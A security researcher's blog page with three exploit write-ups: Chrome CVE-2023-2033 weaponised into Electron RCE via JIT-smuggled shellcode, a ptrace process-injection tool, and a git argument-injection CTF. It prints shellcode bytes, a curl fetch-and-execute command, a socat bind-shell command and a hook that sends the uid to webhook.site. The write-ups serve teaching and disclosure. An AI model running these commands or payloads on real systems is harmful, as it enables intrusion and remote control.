Turb0
Bits, bytes, and bad ideas

Weaponizing Chrome CVE-2023-2033 for RCE in Electron: Some Assembly Required

Tue Mar 12 21:30:17 UTC 2024

Background

I discovered a React createElement based XSS bug in the core functionality of an application with a bug bounty program that had a desktop application. I'd found a couple of these types of bugs in this application before, and knew roughly what the expected payout would be. I wanted to turn the XSS vulnerability into a remote code execution vulnerability on the hosts of the desktop application users. The desktop application was running a version of Electron that used a Chrome version from roughly March 2023 and had Chrome sandboxing disabled in the main renderer window. I needed an RCE PoC to show impact. This is the story of how I got there. Heavy disclaimer, I had no prior browser exploitation experience before this and the process was a learning experience for me. There may be minor, and even major nuances I misunderstood or got wrong here, so take everything with this in mind.

Weaponized RCE PoCs for less than a year old Chrome vulnerabilities are not readily available online. Some of the type confusion bugs over the last year do have PoCs that go as far as to implement v8 heap read/write/addrof primitives. These public PoCs seem to all be built against d8, v8's developer shell. In practice, some of these weren't going to work on this targeted Chrome version, at least without extensive modifications, due to v8 running with very different flags when running under Chrome than a local d8 test run, and behaving very differently.

The target: Chrome/110.0.5481.192 Electron/23.2.0 on x86_64 Linux. For the purposes of this writeup, a very minimal Electron application was built using electron-forge to package a production build that ran an unsandboxed main renderer window and navigated to a local webserver that hosted a site with the exploit code.

CVE 2023-2033 ended up being the vulnerability that was chosen. A public PoC was readily available online with v8 heap read/write/addrof primitives that after some tinkering with, seemed to reliably work on the targeted Electron version. The following writeup is on weaponizing these primitives to achieve mostly stable and reliable RCE on amd64 Linux. The nature of how these primitives are implemented with the type confusion vulnerability is beyond the scope of this blog and can essentially function as a black box due to the wonderful work done in mistymntncop's PoC that implements them.

Exploit development was done locally against a running production Electron application, attaching GDB to the renderer process that ran the exploit code. A local d8 debug version was compiled and used for some small tests to better understand how JS objects are laid out in v8 memory, as well as how TurboFan compiled JIT code was intended to look, but it was not used for exploit development or testing, as it behaved differently than the production Electron application.

Getting the v8 heap primitives working

Mistymntncop's PoC was used as the starting place for this exploit. To use this as a base, it was required to get the v8 heap primitives implemented here working on the targeted version of Chrome.

First, all of the d8 native syntax needed to be removed from the PoC exploit primitives that this exploit was built off of, as it was targeting a production Chrome instance, and not a debug d8 instance, so these threw syntax errors. In this case, this just meant commenting out all of the %DebugPrint lines. It was also required to bulk replace calls to print() with calls to console.log(), as on the Chrome platform, these attempt to open a printing prompt instead of logging out text.

Getting the v8 heap read/write/addrof primitives from mistymntncop's PoC code to work on the target Chrome version was a little tricky. It was written and tested against a specific version of d8, and not written for Chrome. At first when an HTML document that included the exploit.js script was loaded, it was observed that the exploit failed to set up the primitives, and a JavaScript error appeared in the console.

Primitive errors

Following the old OffSec mantra of "Try Harder", these primitives were able to install properly by just running the pwn() function that set everything up four times. On the fourth run, instead of throwing an error, it usually successfully set up the primitives. The usage of them from the stock PoC example was observed to be working.

Working primitives

Code was added to the exploit that made a new pwn() call after a timeout of 0, 100, 200, and 300 milliseconds to attempt to install these primitives correctly.

V8 heap sandbox breakout theory

Having read/write/addrof primitives for the v8 heap was useful, but did not provide code execution for free. After reviewing a couple different writeups that interacted with this problem, it seemed the best bet was to force TurboFan (v8's top level JIT compiler) to optimize a function with Float64 Typed Array data in it, such that movabs instructions with 8 byte immediate arguments were generated for each long float in the array. These 8 byte immediate arguments contained 6 bytes of shellcode and a 2 byte jmp instruction to jump into the immediate value of the next movabs instruction. The v8 heap read/write/addrof primitives could be attempted to be used to tinker with the code addresses of functions to try to somehow get the instruction pointer to jump into the shellcode chunks.

The first writeup, Mem2019's writeup included a function with shellcode to make an execve syscall to execute /bin/sh. This and an additional function were added right before the pwn() calls.

Functions added

The foo function was called several times to cause TurboFan to compile and optimize the function, which was necessary to generate the movabs instructions with long 8 byte immediate arguments.

The shellcode that was assembled and encoded into Float64s was lifted from Mem2019's blog. This shellcode was generated with this Python script, also lifted from Mem2019.

Shellcode maker base

These 8 byte hex values were then converted to Float64s. The foo() function that returned the Float64s in an array was taken and was executed with GDB and d8. The TurboFan compiled optimized assembly code for the foo() function was inspected.

TurboFan generated asm

As expected, a series of movabs instructions with long 8 byte immediate values that contained the shellcode were created by the TurboFan compiled and optimized foo() function.

Playing with the primitives

Based on the research from Mem2019's writeup, the addrof primitive was used on both the foo() and f() functions to get a v8 heap pointer to the backing object. The read primitive was then used to read the JIT code address of the function 0x17 bytes from the start of the object pointer. To test this, code was added to the end of the pwn function that attempted to get the address of both the foo() and f() functions, and to read 8 bytes of memory 0x17 bytes after the start of each address.

F and foo addresses

The primitives appeared to be working, and it appeared possible to get the addresses of function objects and read memory from their address offset by a value. If these were actually the pointers the functions used to determine what code to run when a function executes, it was expected to be possible to make a write call to overwrite function f()'s JIT address with a pointer to function foo()'s, and upon calling f(), it was expected to instead see the result of calling foo(). The following code was added to the pwn() function:

F and foo swap

When this actually ran, and the primitives installed correctly, it was observed that the behavior of function f() was successfully changed to act as if it was function foo().

F and foo swap run

Seeking instruction pointer control

Mem2019's writeup suggested that by writing to this jitAddr offset from a function object and calling the function, the lower 32 bits of the instruction pointer could be controlled. To see what happened when this was attempted, instead of writing the jitAddr of function foo() to function f(), the value 0x4142434445464748 was written. The automatic calls to pwn() were removed, and it was manually called from Chrome DevTools after GDB was attached to the renderer process. If the instruction pointer could be controlled this way, it was expected to observe a segmentation fault with the lowest 32 bits of the instruction pointer matching the lowest 32 bits of the garbage test address.

Test crash

The crash that occured was inspected and it was observed that this was not actually the case. The crash occurred when attempting to read memory from $rcx+0x7, and the low 32 bits of $rcx matched the low 32 bits of the written jitAddr. After this read to $rcx, a jmp occurred that set the instruction pointer to $rcx. A couple instructions back, a familiar 0x17 offset from the value stored in $rdi being read into the low 32 bits of $rcx was visible. It was presumable that $rdi stored a pointer to the function object, and that this value read into the low bits of $rcx was the jitAddr. $r14 was then added to $rcx, presumably some offset that mapped v8 heap addresses to native heap addresses. If what was read from $rcx+0x7 to $rcx before the jump could be controlled, the instruction pointer could be controlled. To try to understand what normally resided there, another renderer crash was caught in GDB where instead of writing the fixed value, fooJitAddr | 0xF0000000 was written, where the highest bit was set, hoping to see another segmentation fault when attempting to read memory from $rcx+0x7. Based on previously read addresses, it was expected that this bit was normally 0.

Finding code addr

When this crash was captured, the segfault occurred in the same spot on the same memory read attempt. This time, however, it was possible to recover the intended original value of the foo function's JIT address by reading the low 32 bits stored at $rdi+0x17 and anding them with ~(0xFOOOOOOO). This gave back the original intended address. $r14 was added to it, and the memory address 0x7 off from that sum was read to get the intended value that without this tampering would have been read into $rcx before jumping to it. GDB inspect was used to observe the instructions at this address.

Function code instructions

Observing the instructions that would have been jumped to, the intended movabs instructions with 8 byte immediate values were present. Because of this, it was inferred that this was the TurboFan generated JIT compiled code for the foo() function. GDB was used to inspect the first 3 instructions parsed at 2 bytes into the first movabs instruction, and the first part of the shellcode was visible. Subtracting the intended start of the function from the entrance into the shellcode, it was calculated that if the function had been jumped into 0x7c bytes further than intended, the shellcode would have begun executing instead of the intended TurboFan generated code.

Seeing shellcode

Gaining instruction pointer control

Based on the previous testing, it was expected that a read of fooJitAddr+0x7 would return the pointer to the compiled TurboFan generated code. Upon actually testing this, it was observed that the address was quite similar to the one in last test. This address was a native heap address, not a v8 heap address, so the primitives could not be used to read and write shellcode at the location on the heap that was going to be jumped to. However, the address could be read, 0x7c could be added it it, and it could be overwritten with this sum. This would lead to this overwritten address getting loaded into $rcx by the previous instruction that was segfaulted on immediately before the jmp $rcx instruction. This would jump into executing the 8 byte immediate value in the first movabs instruction generated by TurboFan for the foo function with the Float64s containing the shellcode.

The pwn function was modified to do this, and it looked like the following:

Foo code ptr overwrite

When this was executed successfully in the vulnerable Electron version, the call to function foo() after the write lead to the TurboFan compiled code being jumped into 0x7c bytes further than intended, where the 8 byte chunks of shellcode started. The shellcode ran successfully, and execve with /bin/sh was called, leading to the following in Electron.

/bin/sh run

The renderer process was gone, as it had replaced itself with /bin/sh and exited. In the GDB session attached to the renderer before running the exploit, it was observed that /bin/sh was successfully executed. On the system used to write the exploit it happened to be a symlink to /usr/bin/dash.

gdb /bin/sh run

This was far enough to prove remote code execution was possible. This wasn't a useful proof of concept payload for a running Chrome renderer process that an attacker didn't have any ability to interact with the stdio of. It was desirable to write more useful shellcode that called /bin/sh with arguments that actually did something impactful.

Writing more useful shellcode

It was necessary to write more useful shellcode that showed ability to execute arbitrary scripts pulled from a remote server. To do this, shellcode was written that ran /bin/sh '$(/bin/curl www.turb0.one/files/s)'. The following shellcode was written that could reasonably do this, and had instructions that were all less than or equal to 6 bytes, so that they could fit in the 8 byte immediate movabs values and leave 2 bytes of room for the jmp at the end into the next 8 byte immediate value.

naiveshellcode

An int3 instruction was included at the beginning so that GDB would break on the shellcode start and the generation of the movabs instructions with 8 byte immediate values by TurboFan could be verified. These 8 byte hexadecimal numbers containing the shellcode were run through this likely overprecise online tool to convert the shellcode chunks to Float64 values for use in the foo() function. The foo() function now looked like the following:

naiveshellcode foo

Due to change in the amount of entries in the array, the TurboFan compiled code actually looked a bit different. The offset from the address of the compiled function that was jumped into had to be changed. The same trick to segfault with known addresses from earlier was used, and the offset was found to be 0x82. The previous pwn() function was updated to use this offset instead of 0x7c. With this change, the exploit was run with GDB attached to the renderer process, and the int3 breakpoint was hit.

naiveshellcode fail

The shellcode was reached, and execution was occurring within it. However, when execution was continued, a segfault occurred in the shellcode instead of /bin/sh being executed.

Troubleshooting longer shellcode

When attempting to work out where and why the segfault occurred, it was clear what had gone wrong with the shellcode. Some instructions before the instruction pointer were listed, and it was observed that the expected movabs instructions with 8 byte immediate values spaced 0x14 bytes apart were not always present.

Shellcode broken assumptions

It appeared that TurboFan had generated code for the foo() function that had optimized the loading of some of the repeated values in the Float64 array that the shellcode lived in. This should have been expected, as TurboFan is v8's top level JIT compiler, and is meant to generate the most optimized JIT code. This meant that if longer shellcode payloads were to be written by this method, it would be necessary to make sure the shellcode didn't repeat itself, so TurboFan wouldn't able to perform these optimizations instead of generating the desired movabs instructions with 8 byte immediate values.

Writing an anti optimizing shellcode generator

It was necessary to modify the shellcode generating python script to write "anti optimization" shellcode so that TurboFan wouldn't be able to optimize out any of the desired movabs instructions that contained the shellcode. In its original state, when an encoded instruction didn't fill the entire 6 bytes of space before the jmp instruction into the next piece of shellcode, the extra bytes in between were filled with nop instructions. This meant that the same Float64 would be generated for the same <= 6 byte chunk of shellcode, which would allow for the optimization behavior from TurboFan to occur that needed to be avoided. Instead, these instructions could be encoded so that the jmp came immediately after the instructions, with the jmp distance modified to reflect that it no longer came at the end, and the rest of the 8 bytes could be filled with procedurally generated junk bytes that instead of getting executed like the nops just got jumped past. This would prevent the Float64 values generated from each chunk of shellcode from being the same for chunks of shellcode less than 6 bytes. The only repeating chunks of shellcode in the longer shellcode that had been written all had room for these additional garbage anti optimizing bytes. The shellcode generator script was modified to implement this, and ended up with functionality that looked like the following:

Better shellcode generator

The script was rerun, the output was run through a Float64 converter to get the floats to replace the content of the array that foo() returned. After attaching GDB and rerunning the exploit with this new payload, the int3 breakpoint was hit again. Upon continuing, instead of the exploit running successfully and /bin/sh executing with the desired arguments, the program instead segfaulted again. Inspecting instructions leading up to the instruction pointer, it was clear that the crash had occurred in the shellcode section, and that the instructions appeared correct. This meant that the optimizing behavior of TurboFan was successfully mitigated. The instructions appeared to be the same, but the distance between the movabs instructions had changed.

Gap size change

The size of the movsd instruction was observed to have changed because it needed to take a larger argument. The generated instructions were reviewed, and it was determined that the assumption of the gap between movabs instructions being 0x14 only held for the first 15. After that, due to larger sizes being needed for the instructions between the movabs instruction, the gap became 0x17. A counter was added to the shellcode generator to account for this in the jmp instructions into the next chunk of shellcode. The segfault occurred because the shellcode didn't jump far enough from the last instruction, and should have instead jumped 3 bytes further. The generator was updated to account for this, and the python looked like the following:

Final shellcode generator

Achieving stager shellcode execution

The new and improved shellcode generator that was enhanced to generate anti optimizing code to ensure TurboFan always generated a movabs instruction for each chunk of shellcode, and supported the longer jumps between movabs immediate values later into the TurboFan compiled code had the int3 at the start of its shellcode removed. A final payload was regenerated and reencoded. The staged payload at www.turb0.one/files/s just had the content /bin/touch /tmp/rcepoc. The exploit was rerun with the final payload. Chrome DevTools reported that the renderer process was gone, suggesting the shellcode had reached the execve syscall successfully. ls /tmp was run, and it was observed that a /tmp/rcepoc file had been created, showing that the shellcode had run successfully.

RCE PoC file written

This showed that the second stage script had successfully been pulled from the web server and executed. A working exploit had successfully been created that practically performed remote code execution in the target Electron version by leveraging v8 heap primitives written for CVE-2023-2033 by mistymtncop with techniques inspired by and adapted from Mem2019's research.

Wrapping things up and fully weaponizing

The calls to pwn() to automatically attempt to run the exploit when the page loads were uncommented. The primitives didn't set up properly every time, and sometimes they crashed instead of working properly. The failure chance on the test machine felt to be about 10% of the time. To attempt to mitigate this, a file, exploitloader.html, was created that iframed 5 instances of exploit.html, which loaded the actual exploit.js that had the exploit code. This was designed to lead to more consistent execution of the RCE PoC payload.

Final versions of files mentioned in this writeup can be found here:

Conclusion

This writeup covers parts of the research process I went through to weaponize CVE-2023-2033 for RCE with a lot of long dead ends cut out. Some conclusions in this writeup were drawn more quickly and understandings reached more directly than they occurred in practice. I went into this with no past browser exploitation experience or knowledge, and left with some functional understanding of some browser exploitation related topics. I was able to get a working full chain PoC put together and a report in for the application I was targeting, and the report was remediated. In the process, I was able to learn tricks for going from v8 primitives to shellcode execution, work out how to get instruction pointer control on the version of Chrome I had to target, and build a script to create anti TurboFan optimization shellcode.


Burster Shell: Spawn Children of Arbitrary Processes

Wed Oct 18 5:42:26 PM EDT 2023

I was testing some of the endpoint protection capabilities of a couple of COTS container security products and wanted to see how well the detection of unusual interprocess memory interactions and process injection attack behaviors on Linux containers worked. I decided to write a pair of short and simple programs, one without PIE enabled that just sleeps and prints a number every 20 seconds, and another that ptrace attaches to a target pid and sets a word of data at a fixed address before detaching. In this case, if the second program made this change in memory to a process instance of the first, it would change the executable code that moves the number to the register to be printed so that it would print a different number. This triggered no specific detections, which seemed somewhat reasonable, as such a minor ptrace interaction would probably be indistinguishable from intended debugger interactions.

I reflected for a bit on what blatantly malicious ptrace usage would look like. An argument could be made that any ptrace calls occurring in a production privileged Linux container is likely malicious, as there shouldn't be any use case for it, especially not debugging. After thinking about what was theoretically possible based on my relatively intermediate understanding of Linux process internals, I settled on wanting to write a tool for spawning arbitrary new processes as children of arbitrary other processes. I would implement this with ptrace by overwriting and then reverting some shellcode and registers.

It is worth noting that this post uses a lot of terms and concepts without explaining them, and expects a basic understanding of Linux process internals and terms surrounding them.

Implementation Plan

To do this in practice, my plan was to build a tool that writes custom shellcode at the target process instruction pointer when ptrace attaches that would include arguments for execve and the actual shellcode to make fork and execve syscalls. After execution was resumed and the fork and execve occurred, the shellcode would then raise a signal from the target process, prompting for the tool to write back the original memory and registers to the target process and ptrace detach.

To do this, the following steps would occur.

  1. ptrace attach to the target process
  2. wait for it to stop
  3. ptrace read registers
  4. store this original register state
  5. build full payload of data to write to target process memory
  6. read payload length number of words of memory from the target process, starting at the instruction pointer
  7. ptrace write the generated payload at the instruction pointer
  8. ptrace set the registers to prepare for the shellcode execution, and move the instruction pointer forward into where the shellcode part of the payload actually starts
  9. ptrace continue target process execution
  10. catch the SIGTRAP raised by the target process once it reaches the end of its shellcode
  11. write back old words of memory to the target process
  12. reset the registers of the target process to their original state
  13. ptrace detach
  14. the target process should be back in its original state but now have a forked child process

Implementation Details

In actually implementing this, there were some steps that in practice had additional details. I wrote this tool in C, and am calling it the burster shell, as the concept of spawning a child from an unaware process can be likened to alien chestbursters. The source code can be viewed here.

Initially during development, instead of having shellcode that forked and then executed, I instead had shellcode that just executed, replacing the target process image entirely, not requiring any cleanup. This seems like a useful functionality, but not the intended goal of this tool, and something that I may want to come back to.

Referencing the source, in the final implementation, the shellcode looks like the following. // syscall| cmp rax 0 |jne +9 |mov rax 0x3b |syscall|int| const char shellcode[] = "\x0f\x05\x48\x83\xf8\x00\x75\x09\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\xcc";

Assembled, the shellcode looks like this.

shellcode instructions

This shellcode makes a lot of assumption about the state of registers before it is run. It makes a syscall, assuming that the registers are already set up for making a fork syscall, then compares the returned pid in rax, jumping to the instruction to raise a SIGTRAP in the case of the parent. In the case of the child, this jump doesn't occur, and rax is set to the syscall number of execve. Another syscall instruction is run, assuming rdi contains the pointer to the future child *argv[] written in the payload to the process memory before the shellcode, and rsi contains the pointer to the start of the filename in the payload. It is also assumed that rdx (*envp[]) is set to 0. This leads to the child process making a successful execve call and replacing its image entirely, ending its execution of the shellcode.

The full payload with the char* strings of argv, and the char** pointers to the strings of argv looks like the following.

//[filename][argv0][argv1][&argv0][&argv1][null ptr to terminate argv][nop buffer][shellcode]

In a case where /usr/bin/sleep 20 is intended to be executed as a child of a target process, the payload may look like the following.

full payload

In this example, argc is 2, but this is supported for an arbitrary argc. The filename is a null terminated string used for the execve syscall. The argv0 and argv1 values are also null terminated strings that include the content of the arguments of the child process to create. &argv0 and &argv1 point to the instruction pointer this payload is written to plus the distance from the start of the payload that argv0 and argv1 sit at respectively. A null ptr comes after these to terminate *argv[]. 8 nops are included after the "data" section of the payload to prevent any of the data from globbing with the instructions and resulting in invalid, or unintended instructions being formed with the executable shellcode due to arbitrary x86_64 instruction length. The shellcode is then written, and its start is the address that the target process instruction pointer will be set to before continuing the target process.

Usage Demonstration

The interface for this tool is flavored as a shell. By default, it will target its own child process that it creates at launch, but the target process can be changed with a setpid [pid] shell builtin command. Instead of spawning children of its own like a traditional shell, it will instead ptrace attach to the target process and use the previously described mechanisms to spawn children on the target process.

For this example demonstration, the goal will be to spawn a socat bind shell as a child of the already running dhclient process. First, we will run pstree to get the currently running process hierarchy tree, and then run pidof to get the pid of our target process.

finding target pid

We can see that the dhclient process has two children, another dhclient process, and sleep. We can also see that the pid of the dhclient process we want to target is 399. We can now run the burster shell and use the shell builtin to set the target pid to 399. Now, any commands executed will be spawned as children of the target process, dhclient, via the previously described mechanisms. We now can run /usr/bin/socat -d -d TCP4-LISTEN:1337 EXEC:/bin/bash to start a socat bind shell as a child of the dhclient process.

using burster shell to start bind shell

We see that it appears to have executed successfully, and we can exit the burster shell. We can now attempt to connect to the bind shell and execute commands. We see that we can do this successfully, and running pstree, we see that the dhclient process now has a child process of socat, which in turn has its own bash child process that is our active bind shell.

using bind shell

Our bind shell will continue to run as a child of dhclient until the parent dies, it is killed, or the system is rebooted. We have successfully spawned a child process of an arbitrary process.

Implementation Limitations

This implementation is very naive and has a lot of flaws. Here are some of the ones that have been identified.

Leaking Zombie Processes

When children of the target processes exit, they are not cleaned up by the parent, which leads to all children being leaked as zombie processes. This is unfortunate, and without injecting long term code into the target process, I am unaware of a way to handle this.
This is why there is a sleep child of the dhclient process in the demonstration section. It was a zombie created by a previous test, and I have no way to clean it up.

No *envp[] Passed to Children

The execve syscall is deliberately made with a null *envp[] pointer. It is difficult to say what *envp[] should even be. Should a copy of the burster shell's *envp[] be copied into the payload, like the target *argv[] is? Should some introspection of stack frames be done by the burster shell to find the target process's *envp[] address and use that? In either case, additional code would have to be written, and new problems would crop up in the details.

Fixed Length Buffers

As a C program, this shell sucks. There are blind memcpy(3) calls that can easily overflow the fixed length buffers on the stack. The arrays that some of the target process data gets read into are also fixed length. One can observe here bad practices and bad code, but ultimately this is meant to be a fast and useful proof of concept tool.

Burster Shell Lacks Features

As a shell, this shell sucks. I'd like readline or similar support, some ways to control certain *envp[] values passed to children, more shell builtins, piping (this could be a nightmare), a way to escape spaces and wrap things in quotes, and just generally more niceties expected of a usable shell.

No Cross Platform Support

This code is aggressively non portable. The shellcode assumes x86_64. The syscall ABI assumes Linux calling conventions. A long is assumed to be the same size of a pointer, which is assumed to be 8 bytes.

No Guarantee That Payload is Written to Executable Memory

The burster shell process assumes that there is enough executable memory after the instruction pointer at the time of attaching to a target process to hold the entire payload. If a fixed payload size was set to be less than 4096 bytes, the typical page size on a Linux system, and instead of writing at the instruction pointer, the payload was written at the start of the current page calculated based on page address alignment rules, this could be done safely.
In the case where this assumption fails, the target process will segfault when running the shellcode. In practice, I have yet to see this occur.

Conclusion

This project started as an unnecessarily deep dive into evaluating COTS container security runtime products, and lead me to a better understanding of Linux processes and ptrace, as well as a usable proof of concept process injecting shell. I am avoiding including any details, drawing any conclusions, or dropping any vendor names here around how the container security capabilities detected the process injection behaviors of this tool on Linux containers with the ptrace capability. In short, I was not impressed.

In the future, I may use this tool for interesting post exploitation trickery, and generally break it out as a cool party trick in occasions that call for it. I was able to confirm a lot of my understanding of Linux process internals by actually implementing my idea, and am surprised that it ended up working the way I thought it would.


Discovering RCE in Repository Onboarding Code

Sun Jun 11 01:46:52 PM EDT 2023

In the afternoon of a day a couple of weeks ago, I was looking at a company's internal platform used by developers for repository onboarding, amongst other things, that ran a lot of custom code. I was drawn to a loose thread, that upon picking at, kept unraveling, ultimately resulting in the development of a stable RCE exploit. This testing was performed with permission, sanctioned by the company's AppSec program, and with access to the custom parts of the application's .net source code. For obvious privacy and security reasons, I cannot publish a writeup about the discovery of the vulnerability and the development of the exploit for this system. Although it has since been patched, I do not want to disclose anything about the nature of the application or the company. Instead, here's a writeup about a CTF challenge I wrote on an evening of a day a couple of weeks ago.

Initial Interactions

Upon looking at our target, we see the following page that displays an input for text to convert, an output for converted text, a submission button, and a couple of links to backend source code.

challenge view

If we enter a test input and actually submit the form with the Chrome devtools network tab open and recording, we see the following request in the below image.

challenge request

Looking at the request headers, the request URL, and the response headers, we can learn a few things. Firstly, we see that the request is made to /api/function_proxy and provided another URL as a query string parameter. This second URL refers to a "backend" hostname and a /convert route, with our input text set as the text query string parameter. This suggests to us that the API endpoint we are hitting is making a request to the specified URL it is provided, in this case http://backend:8080/convert?url=test, and providing us back the response. It suggests that the API has some custom DNS entries that allow it to resolve backend to a valid IP when making the request, and that we cannot hit whatever the backend service is directly.

Additionally, we see an Authorization header being set for the request with a uuid looking value. We also see in the response headers that the remote server is an nginx server, but the X-Powered-By header says Express, suggesting that we are communicating with an Express server reverse proxied behind an nginx server.

If we look at the response body and the output box, we see the value dGVzdA== that looks like a base64 string. Upon decoding it, we get the value test, our input. This behavior doesn't really give us too much to look into, but the ability to pass the /api/function_proxy a URL parameter seems interesting, so let's see what the application source looks like and what we may be able to do with this.

Source Review

Following the links on the page to the two sources we get this and this file.

The first file appears to be a self contained Node.js Express web server application. It supports two routes, the first being one that exposes the source file we are reading, and the other being the /function_proxy route we saw the frontend talking to when we submitted the form. If we look at the logic implemented by the code that handles the /function_proxy route, we can see that the following flow runs.

  1. Check that an Authorization header is set, if it isn't, return a 401 unauthorized response unless the url query parameter is set to http://backend:8080/index.js
  2. Check if a url query parameter is specified, and check if it begins with http://backend:8080/. If either of these checks fail, return a 403 forbidden response.
  3. Use the axios library to make a GET request to the url specified in the url query parameter and include an Authorization header with the backend key loaded from an environment variable at runtime. If this request errors, return a 500 response with the error message.
  4. If it exists, return the result of the request from the last step.

This tells us that an Authorization header is required, but the value isn't ever checked. It also tells us that unless we can devise a way for a URL to begin with http://backend:8080/ and be interpreted to resolve to something else, we may not be able to perform any server side request forgery attacks. It does seem that we can try other URLs beginning with http://backend:8080/ and have a proxied request to the backend be made on our behalf, but we are not yet sure of what other routes may be implemented on the backend.

If we look at the second file, we can see what appears to be another self contained Node.js Express web server application. This one seems more complicated, and has a piece of middleware that validates that all requests have an authorization header set that matches a key loaded from an environment variable at runtime, rejecting requests that fail this check with a 401 unauthorized response. We see three routes implemented, one for exposing this source code file, one for handling the /convert logic we saw referenced in our request from submitting the form that takes a text parameter and base64 encodes it, and a third, /repo_has_conf.

The logic for handling the /repo_has_conf route works as follows:

  1. Check that a repoName query parameter is set, if not, return a 400 bad response.
  2. Check if an instanceId query parameter is set, if not, generate a random UUID and use it as the instanceId.
  3. Build a repoUrl from https://github.com/ with the value of repoName concatenated
  4. Check if a local path exists on disk where the path is built from ./repos/ with the instanceId value concatenated to it
  5. If this path doesn't exist, call a parseArgs() function with the value resulting from clone "${repoUrl}" "${instanceId}" and store the result as args
    • Call execFileSync() with the string literal git passed as the file, and the args built from the previous step as the arguments, in the working directory of ./repos
    • If this command fails, abort as if the config file was not found
  6. Check if a config.json file exists in the './repos/' + instanceId + '/config.json' path and return whether or not it does.

This is very interesting looking logic to us, as it involves program execution and disk IO using values provided by user input. Knowing how execFileSync works, and knowing that in this code the file argument is hardcoded to be git, we know that we cannot attempt to control this. We can however potentially control the argument array, depending on how the parseArgs() function handles the string built from some user input that is handed off to it. Because of how execFileSync works, we cannot inject shell control characters like &&, ||, ;, $(), or other similar common attacks against program execution providers.

If we read through the parseArgs() function and work out what it actually does, we see that it splits a string into an array on spaces, unless the space is inside of quotes, removing quotes. If we copy and paste the function and run it locally with some test inputs that could conceivably be built from valid user inputs, we can see a string like clone "https://github.com/testuser/testrepo" "testInstance" gets parsed into the array ['clone', 'https://github.com/testuser/testrepo', 'testInstance']. Seeing how this works and thinking about what inputs we control gets us to a place where we can start testing some requests out against the running challenge instance.

Digging Deeper

Now that we know a backend /repo_has_conf route exists, we can try making a request to this endpoint through the /api/function_proxy endpoint. Putting together a request that should do this, we see we can successfully access the /repo_has_conf endpoint and get a 400 bad response due to not providing a repoName.

request failed successfully

We can try creating an example repo on GitHub that has a top level config.json file, and see if it is able to clone and identify the file properly when requested. If we do this, and send the request to check for it, we see it does successfully clone the repo and validate the existence of the config.json file.

success request

Seeing as we can make requests for repo configuration checks properly, we can start trying to make checks improperly. We can try to pass quotes in with the repoName, and see if when they get sent through parseArgs, additional arguments are parsed out. From our source code review, we know that the string being built to split into an arguments array is clone "https://github.com/${repoName}" "${instanceId}". We can try injecting quotes into our repoName query parameter and seeing if we get a desirable outcome. If we try a repoName of exampleUser/exampleRepo" test " we get a result telling us that no repo configuration was founding, meaning it likely errored when attempting the git clone. If we try a repoName of exampleUser/exampleRepo" -j "1 we get a result telling us that a repo configuration was found, meaning that the clone happened successfully, and the config.json file was found.

success request

Breaking down what is happening here, in the first case where the clone failed, the following command line argument string is built server side, clone "https://github.com/exampleUser/exampleRepo" test "" "someRandomGuid" which if we run through our local version of parseArgs, we can see results in the argument array of ['clone', 'https://github.com/exampleUser/exampleRepo', 'test', '', 'someRandomGuid']. This has extra arguments that when run with git will throw an error. We can test this locally by taking these arguments and attempting to run git clone https://github.com/testuser/exampleUser/exampleRepo test someRandomGuid, which we will see results in fatal: Too many arguments..

In the second case, the following command line argument string is built server side, clone "https://github.com/exampleUser/exampleRepo" -j "1" "someRandomGuid" which if we run through our local version of parseArgs, we can see results in the argument array of ['clone', 'https://github.com/testuser/exampleUser/exampleRepo', '-j', '1', 'someRandomGuid']. This is a valid git clone call, as the -j flag is used to specify the number of submodule fetch jobs.

Seeing as the application logic is flawed and we are able to inject arbitrary extra arguments to a git program execution that occurs server side, we can now begin looking into ways to take advantage of this.

Building An Exploit

Knowing that we can inject arbitrary arguments after a certain point in the argument array for a git command, it seems to reason we should look deeper into extra argument flags supported by git, specifically, in our case, for git clone. We can review the official documentation here. Looking through this, an interesting flag that stands out is the --template flag. It allows us to specify a path to a local directory that will be used as a template directory for the cloned repository. Templates provide some files, but also include githooks that will be copied from the template directory, and triggered on the new cloned repository as appropriate. This includes the post-checkout hook that will execute after a successful git clone.

We can play around with this locally, setting up a ./template/ directory and creating a hooks directory in it with an executable post-checkout shell script in it. We can then try to clone any valid repo that successfully clones, and pass the relative path to the template directory after the --template flag, and it will clone the repo, and run the post-checkout hook from the template directory, as seen below.

hook run

Seeing this working locally makes it easier to understand how an attack could be operationalized against the remote server. We can inject a --template flag that points to a relative path on the filesystem of the remote server containing user controlled content. The problem for us is getting user controlled content in a known relative path of the remote server's filesystem. Fortunately, the same logic that allows for this malicious git clone call also allows for arbitrary file creation at a known path. We know that we can provide an instanceId value, and that the specified repoName will be cloned to that path. We can use this to do a two part exploit, one call that gets a repo cloned to a known relative path on the filesystem with a directory with hooks scripts in it that can be used as a template later, and another that actually injects the --template flag and references the path to the first repo.

First, we set up our template directory in our example repo. We then create a hooks directory in it. We then create a post-checkout shell script containing a curl command to a remote server, in this case we are using webhook.site, that adds the current user id at the end of the URL to get a response back from our otherwise blind execution. We get these changes pushed and our repo layout looks like the below image.

repo layout

We can now make a request to the server with our repoName an untampered reference to our repo, and our instanceId set to a known value, in this example, we can call it templateDir.

template cloned

The server responds saying that the config file was found, meaning the clone was successful and that our template directory should now exist at a path of templateDir/templates relative to the git clone process working directory. Knowing this, we can now do a second clone, this time injecting extra arguments into the git clone process via the repoName, by specifying a repoName of exampleUser/exampleRepo" --template "templateDir/templates. Making this request should trigger the execution of the hook from our first clone after this second clone's checkout is completed, which should make a curl request to our webhook.site endpoint with the user id of the user the remote server process is running as.

rce request made

The server says the config was found, which means the clone was successful and no errors were thrown by the injected template. Checking our webhook.site page that the script curls the result of our id -u command to, we see that we did indeed get a request from a curl user agent with a uid in the path, confirming our RCE on our target and proving that our exploit worked.

rce confirmed

This process can be cleaned up a bit, and boiled down into a python script for a stable exploit where a properly configured repo with a post-checkout hook to run as the RCE payload is provided as input.

Conclusion

There's a lot of different takeaways here, and a lot of them could be left as an exercise to the reader. In this specific case, white box testing sure was valuable, as the vulnerability would likely have never been discovered otherwise due to nothing else referencing the vulnerable code. It is important to be very aware of and picky about how non static values are used to build program execution directives. Aspects of this challenge may seem a bit contrived and weird, but know that it was modeled to result in a very similar final exploit script to a real world finding.


Byte Macro: Implementing an Obscure Telnet Option

Sun 15 Aug 2021 05:26:11 PM EDT

